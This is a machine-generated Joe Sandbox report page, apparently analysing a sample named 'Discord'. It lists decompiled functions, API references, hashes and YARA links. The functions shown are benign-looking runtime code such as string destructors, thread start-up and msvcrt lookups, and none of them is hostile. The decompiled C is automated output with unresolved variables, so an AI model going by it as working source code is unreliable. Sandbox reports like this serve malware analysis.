Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: afe92c2f03280c56efcd12b39c9c540b503ce0f8d98e0528722dfd55a296149a
Instruction ID: b70be1263504349059eae887fb55d9bbc5b4c7d17e871297ddd79d8e88da5371
Opcode Fuzzy Hash: afe92c2f03280c56efcd12b39c9c540b503ce0f8d98e0528722dfd55a296149a
Instruction Fuzzy Hash: 1DF0F974948A158FCB10EF24C888B5CF7F8FF94214F11899D954AE7251DB305A84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6DE89F66 Relevance: 7.5, APIs: 5, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE89F66() {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;
				intOrPtr* _t28;

				_t18 = _t11;
				 *_t25 = _t23;
				L6DE8DD48();
				_t26 = _t25 - 4;
				while(1) {
					 *_t26 = _t23;
					L6DE8DD48();
					_t27 = _t26 - 4;
					_t15 = _t24 - 0x37;
					 *_t27 = _t15;
					L6DE8DD48();
					_t28 = _t27 - 4;
					 *_t28 = _t18;
					L6DE8EBA0();
					_t18 = _t15;
					 *_t28 =  *((intOrPtr*)(_t24 - 0x3c));
					L6DE8DD48();
					_t26 = _t28 - 4;
				}
			}

0x6de89f66
0x6de89f6b
0x6de89f71
0x6de89f76
0x6de89f79
0x6de89f7c
0x6de89f82
0x6de89f87
0x6de89f90
0x6de89f93
0x6de89f96
0x6de89f9b
0x6de89f9e
0x6de89fa1
0x6de89fa6
0x6de89fb1
0x6de89fb4
0x6de89fb9
0x6de89fb9

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F71
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F82
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F96
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE89FA1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89FB4

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 3e45920b37dfa7a50a9e10ba115e700f3603b1b5453694c09ad71cc2116c1b79
Instruction ID: e74af6b114749c75d2d27ff9515e0eedcfb1b93bb69b6c028e1a89848875e389
Opcode Fuzzy Hash: 3e45920b37dfa7a50a9e10ba115e700f3603b1b5453694c09ad71cc2116c1b79
Instruction Fuzzy Hash: 48F01DB89055048FCF00EF78D69849CF7F0AF48618F11452ED9469B251EB30AA08CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE942BF Relevance: 7.5, APIs: 5, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE942BF() {
				intOrPtr _t58;
				intOrPtr _t61;
				void* _t87;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr* _t121;

				_t119 = _t58;
				while(1) {
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x14)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x10)) - 0xc);
					_t61 =  *((intOrPtr*)(_t87 + 0xc));
					 *_t121 = _t120;
					L6DE8DD48();
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t61);
					 *_t121 = _t119;
					L6DE8EBA0();
					_t119 = _t61;
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x78)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x74)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x70)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x68)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x64)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x60)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x5c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x58)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x54)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x50)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x48)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x44)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x40)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x3c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x38)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x34)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x30)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x28)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x24)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x20)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x1c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x18)));
				}
			}

0x6de942bf
0x6de941cc
0x6de941cf
0x6de941d5
0x6de941da
0x6de941de
0x6de941e4
0x6de941e9
0x6de941ea
0x6de941ed
0x6de941f3
0x6de941fc
0x6de94202
0x6de94207
0x6de94208
0x6de9420b
0x6de94210
0x6de94058
0x6de9405e
0x6de94063
0x6de94067
0x6de9406d
0x6de94072
0x6de94076
0x6de9407c
0x6de94081
0x6de94085
0x6de9408b
0x6de94090
0x6de94094
0x6de9409a
0x6de9409f
0x6de940a3
0x6de940a9
0x6de940ae
0x6de940b2
0x6de940b8
0x6de940bd
0x6de940c1
0x6de940c7
0x6de940cc
0x6de940d0
0x6de940d6
0x6de940db
0x6de940df
0x6de940e5
0x6de940ea
0x6de940ee
0x6de940f4
0x6de940f9
0x6de940fd
0x6de94103
0x6de94108
0x6de9410c
0x6de94112
0x6de94117
0x6de9411b
0x6de94121
0x6de94126
0x6de9412a
0x6de94130
0x6de94135
0x6de94139
0x6de9413f
0x6de94144
0x6de94148
0x6de9414e
0x6de94153
0x6de94157
0x6de9415d
0x6de94162
0x6de94166
0x6de9416c
0x6de94171
0x6de94175
0x6de9417b
0x6de94180
0x6de94184
0x6de9418a
0x6de9418f
0x6de94193
0x6de94199
0x6de9419e
0x6de941a2
0x6de941a8
0x6de941ad
0x6de941b1
0x6de941b7
0x6de941bc
0x6de941c0
0x6de941c6
0x6de941cb
0x6de941cb

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE941D5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941E4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE94202
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE9420B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: a851629847efef5270f4eb97bc8b956ddcd4af9ef520b0c988d01fdda3b888c9
Instruction ID: 4d7c1502751cf2f7731c962ef3a6185c0f8a5e764b0d6049540bcb1f73e43930
Opcode Fuzzy Hash: a851629847efef5270f4eb97bc8b956ddcd4af9ef520b0c988d01fdda3b888c9
Instruction Fuzzy Hash: 35F01CB40499009FC305EF18D9D4829B7E9EFD8764B22864DE99A8F255DF309940CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BCEE Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6DE8BCEE() {
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;

				_t23 = _t24 - 0x17d;
				_t15 = _t10;
				 *_t25 = _t23;
				L6DE8DD48();
				while(1) {
					 *_t25 = _t23;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t24 - 0xc4)) - 0xc);
					 *_t25 = _t23;
					_t22 = _t24 - 0x17c;
					L6DE8DD48();
					_t14 = E6DE942E0(_t22);
					 *_t25 = _t15;
					L6DE8EBA0();
					_t15 = _t14;
					_t23 = _t24 - 0x17d;
				}
			}

0x6de8bcee
0x6de8bcf4
0x6de8bcfc
0x6de8bd02
0x6de8bd08
0x6de8bd0e
0x6de8bd14
0x6de8bd19
0x6de8bd20
0x6de8bd23
0x6de8bd2c
0x6de8bd34
0x6de8bd39
0x6de8bd3c
0x6de8bd41
0x6de8bd43
0x6de8bd43

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD02
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD14
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD2C
_ZN7config1D1Ev.DPUB1 ref: 6DE8BD34
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE8BD3C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$N7config1ResumeUnwind_
String ID:
API String ID: 520181850-0
Opcode ID: 5ba059674422e9bfd58c864ab234edd070f3ae3a73b50e1fc2a5e314f6dbb135
Instruction ID: fc9939f576beb3608364056fb74fada9b783bc60da882658d58146846e046a8b
Opcode Fuzzy Hash: 5ba059674422e9bfd58c864ab234edd070f3ae3a73b50e1fc2a5e314f6dbb135
Instruction Fuzzy Hash: 78F03A759085288FCB109F24DC846ADF3F5AF98304F12468D9649A7251CB302E41CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE939DE Relevance: 7.5, APIs: 5, Instructions: 25COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE93A04
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE93A13
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000), ref: 6DE93A22
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000), ref: 6DE93A31
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE93A3A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 02081480ba9fae9ff3a655cbf4c87973354baa01695bb1a142b37ea8feb8a3f1
Instruction ID: 8d4c26a67c4932e47919313ad2bdefe015d7d066aa6927fd41814610411c8263
Opcode Fuzzy Hash: 02081480ba9fae9ff3a655cbf4c87973354baa01695bb1a142b37ea8feb8a3f1
Instruction Fuzzy Hash: 4AF01CB40499009FC305EF18D9D8828B7E9FFD8654F22865CE98A9B255DF305940CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00402910(intOrPtr* __eax, intOrPtr* __ecx, intOrPtr _a4) {
				void* _v12;
				intOrPtr* _v16;
				char _v20;
				char* _t22;
				intOrPtr* _t24;
				intOrPtr* _t28;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t43;

				_t38 = _t37 - 0x20;
				 *__ecx = 0;
				 *_t38 = 0x1c;
				L00402600();
				 *((intOrPtr*)(__eax + 4)) = 1;
				 *((intOrPtr*)(__eax + 8)) = 1;
				 *__eax = 0x4044b8;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				 *((intOrPtr*)(__eax + 0xc)) = 0x4044a0;
				 *((intOrPtr*)(__eax + 0x18)) = _a4;
				 *_t38 = 0x4042c8;
				L004025F0();
				_v16 = __eax;
				_t21 =  !=  ? __eax + 0xc : 0;
				_v20 =  !=  ? __eax + 0xc : 0;
				_t22 =  &_v20;
				 *((intOrPtr*)(_t38 - 4)) = _t22;
				L00402608();
				_t28 = _v16;
				_t43 = _t28;
				if(_t43 != 0) {
					asm("lock sub dword [ebx+0x4], 0x1");
					if(_t43 == 0) {
						_t24 =  *((intOrPtr*)( *_t28 + 8));
						__eflags = _t24 - E004027E0;
						if(__eflags != 0) {
							_t22 =  *_t24();
						} else {
							_t15 = _t28 + 0xc; // 0x0
							_t22 =  *((intOrPtr*)( *_t15))();
						}
						asm("lock sub dword [ebx+0x8], 0x1");
						if(__eflags == 0) {
							_t22 =  *((intOrPtr*)( *_t28 + 0xc))();
						}
					}
				}
				return _t22;
			}

0x00402917
0x0040291a
0x00402920
0x00402927
0x0040292e
0x00402935
0x0040293c
0x00402942
0x0040294e
0x00402955
0x0040295f
0x00402962
0x00402969
0x0040297d
0x00402980
0x00402983
0x00402986
0x00402989
0x0040298c
0x00402991
0x00402997
0x00402999
0x0040299b
0x004029a0
0x004029b2
0x004029b5
0x004029ba
0x004029d6
0x004029bc
0x004029bc
0x004029c2
0x004029c2
0x004029c4
0x004029c9
0x004029cf
0x004029cf
0x004029c9
0x004029a0
0x004029a8

APIs

_Znwj.LIBSTDC++-6 ref: 00402927
_ZNKSt9type_infoeqERKS_.LIBSTDC++-6 ref: 00402969
_ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE.LIBSTDC++-6 ref: 0040298C

Strings

0(@, xrefs: 0040293C

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: Impl_baseM_start_threadS_10_St10shared_ptrSt6thread15_St9type_infoeqZnwj
String ID: 0(@
API String ID: 2625123894-4037792696
Opcode ID: 9f9179d9ede122d46aa9c52934b3f689281131daeaa67c187994529de137aef1
Instruction ID: 337b7315343709b09fb64aaac5eaf5c9de6d3f797213fc2c21fdb380928d0efa
Opcode Fuzzy Hash: 9f9179d9ede122d46aa9c52934b3f689281131daeaa67c187994529de137aef1
Instruction Fuzzy Hash: F9216AB0A002048FCB04EF65C698B5ABBE4AF45314F0585BAD845AF3D6C7B9D848CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6DE88A80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag.DPUB1 ref: 6DE88AA3
ShowWindow.USER32 ref: 6DE88ACF

Strings

m, xrefs: 6DE88B02

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Iter_equals_valN9__gnu_cxx17__normal_iteratorS0_5__ops16_ShowSt26random_access_iterator_tagSt6vectorSt9__find_ifWindow
String ID: m
API String ID: 37000815-723020824
Opcode ID: 0aa97393df47fb9410f11b8b4265d0a2b2a9bbc0c0650d402626c851000d498a
Instruction ID: 6f2c6730e007450c0013673a43ee8a4a7fc5c8587ed9cee4d16b746900552698
Opcode Fuzzy Hash: 0aa97393df47fb9410f11b8b4265d0a2b2a9bbc0c0650d402626c851000d498a
Instruction Fuzzy Hash: 5801E97050AB459FEB40EF28D4C461A7BF0BB4A708F54896EF988DB345E73494458B63

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9370C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6DE9370C(void* _a4) {
				void* _v8;
				char* _v24;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				WCHAR* _t8;
				struct HINSTANCE__* _t12;
				void* _t15;
				char** _t16;

				_t16 = _t15 - 0x14;
				 *_t16 = L"msvcrt.dll";
				_t5 = GetModuleHandleW(_t8);
				_v24 = "_set_output_format";
				 *(_t16 - 4) = _t5;
				_t6 = GetProcAddress(_t12, ??);
				_t7 =  ==  ? 0x6de93700 : _t6;
				 *0x6de9703c =  ==  ? 0x6de93700 : _t6;
				goto __eax;
			}

0x6de93714
0x6de9371a
0x6de93721
0x6de9372a
0x6de93732
0x6de93735
0x6de9374b
0x6de9374e
0x6de93754

APIs

GetModuleHandleW.KERNEL32 ref: 6DE93721
GetProcAddress.KERNEL32 ref: 6DE93735

Strings

_set_output_format, xrefs: 6DE9372A
msvcrt.dll, xrefs: 6DE9371A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _set_output_format$msvcrt.dll
API String ID: 1646373207-3508247455
Opcode ID: a2e153d03c4d9e21c3b2706cff09af1976af2488b9b62a8a40e89d445aa7f84b
Instruction ID: c795b8a48e3bd9e12ba405a4bc2b4f2b30bea82c692209b445c29ab7114224f7
Opcode Fuzzy Hash: a2e153d03c4d9e21c3b2706cff09af1976af2488b9b62a8a40e89d445aa7f84b
Instruction Fuzzy Hash: C6E0C9B59053059BCB00BF6AC58A10A7FF4AB09250B518528D94A9B205EB30E8488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6DE93721
GetProcAddress.KERNEL32 ref: 6DE93735

Strings

_set_output_format, xrefs: 6DE9372A
msvcrt.dll, xrefs: 6DE9371A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _set_output_format$msvcrt.dll
API String ID: 1646373207-3508247455
Opcode ID: 4f512ff0130e568e15ad50586b5dc19c6605a9682b9d82b84f3786cb520da75f
Instruction ID: 18b47a7a0ab14372c37f5512966ebb2a5ee89886e249c2ab33b92d3ffa97ed3a
Opcode Fuzzy Hash: 4f512ff0130e568e15ad50586b5dc19c6605a9682b9d82b84f3786cb520da75f
Instruction Fuzzy Hash: 47E0E5F09053059BCB00BF6AC68A20A7EF4AB09250F508528D84A8F205EB30D8488BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6DE937D9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6DE937F2
strchr.MSVCRT ref: 6DE93802
atoi.MSVCRT ref: 6DE93815

Strings

., xrefs: 6DE937F7

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 740796216893cde024998bbc3018317718b07ec21f3dfb3caa245498cf402530
Instruction ID: 829e79b6ee7db27c7c601b950894bd14165e83be7874d12ec5cb5cd81ee6ea98
Opcode Fuzzy Hash: 740796216893cde024998bbc3018317718b07ec21f3dfb3caa245498cf402530
Instruction Fuzzy Hash: 4DE0ECB590A7415AE7106FB8C50432AB6E1AF80308F96C81CC5885B385EF7994449782

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93759 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E6DE93759() {
				char* _v24;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				WCHAR* _t6;
				void* _t9;
				char** _t10;

				_t10 = _t9 - 0x18;
				 *_t10 = L"msvcrt.dll";
				_t2 = GetModuleHandleW(_t6);
				_v24 = "_get_output_format";
				 *(_t10 - 4) = _t2;
				_t3 = GetProcAddress(??, ??);
				_t4 =  ==  ? E6DE936F0 : _t3;
				 *0x6de97038 =  ==  ? E6DE936F0 : _t3;
				goto __eax;
			}

0x6de93763
0x6de93766
0x6de9376d
0x6de93776
0x6de9377e
0x6de93781
0x6de93791
0x6de93794
0x6de9379a

APIs

GetModuleHandleW.KERNEL32 ref: 6DE9376D
GetProcAddress.KERNEL32 ref: 6DE93781

Strings

_get_output_format, xrefs: 6DE93776
msvcrt.dll, xrefs: 6DE93766

Memory Dump Source

